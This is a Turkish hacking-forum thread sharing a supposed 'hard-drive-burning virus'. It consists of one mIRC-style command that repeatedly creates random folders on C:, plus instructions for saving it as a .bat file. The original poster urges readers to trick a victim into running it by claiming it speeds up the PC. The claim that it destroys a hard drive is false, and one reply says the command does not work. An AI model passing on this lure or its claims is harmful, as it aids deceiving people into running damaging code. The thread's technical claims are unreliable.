hdd yakan virüs

nofear54

Üye
26 Kas 2006
87
0
c://windows/system32
Arkadaşlar size verceğim kodu kişinin çalıştırına yazdırabilirseniz veye notpeda kodu yapıştırıp biçimini bat. e çeviirseniz dosyayı açtığı anda hddsi yanar işte komut

/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)

kolay yapmak isterseniz kurbana bunu çalıştıra yaz pc hızlanıo fln derseniz oltaya gelebilir hadi sizze kolay gelsin

ALINTIDIR !!!

newyel

Yeni üye
17 Ağu 2007
4
0
bu virüs bi işe yaramıyor....çalıştıra yazınca uyarı gösteriyor ve yeniden deneyin diyor....

LuiLui

Katılımcı Üye
26 Ağu 2007
345
0
bata cevırmeyı bırı bana anlatsın yaw
Dostum not defterini aç arkadaşın verdiği kodları kopyala ve yeni bir not defteri aç ve içerisine yapıştır... Not defterinin sol üst bölümünden Dosya yı tıkla ve farklı kaydet de ... Ve son olarak ;
Dosya adı yazan bölüme .bat uzantılı bir isim koy ...
mesela HddYakanVirüs.bat...
Kaydetme yeri olarak nereyi seçtiysen .bat uzantılı virüsün oraya kaydedilmiştir...
Yanlız tıklamamanı öneririm aksi halde virüs çalışır ... Ava giderken avlanırsın :D

cinciz007

Yeni üye
21 Ağu 2007
23
0
arkadas virusun ismini bat qoymaqyib basqa bir seyler dusunsek calismazmi? mutleq bat olmalidir yoksa?

SCADY

Yeni üye
12 Tem 2007
48
1
kardeş ayop oluyor verdiğimiz konuların başlaığını deiştirip vermek genede emeğine sağlık allah(cc) kimseye zeval vermesin

Y1L4N

Yeni üye
29 Şub 2008
32
0
33
Trabzon
napacagimi sasirdim yaw:D ise yaramiyor diyolar denemek istiyorum bi yandan da ben hdd mi seviyom yaw:yaho1

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.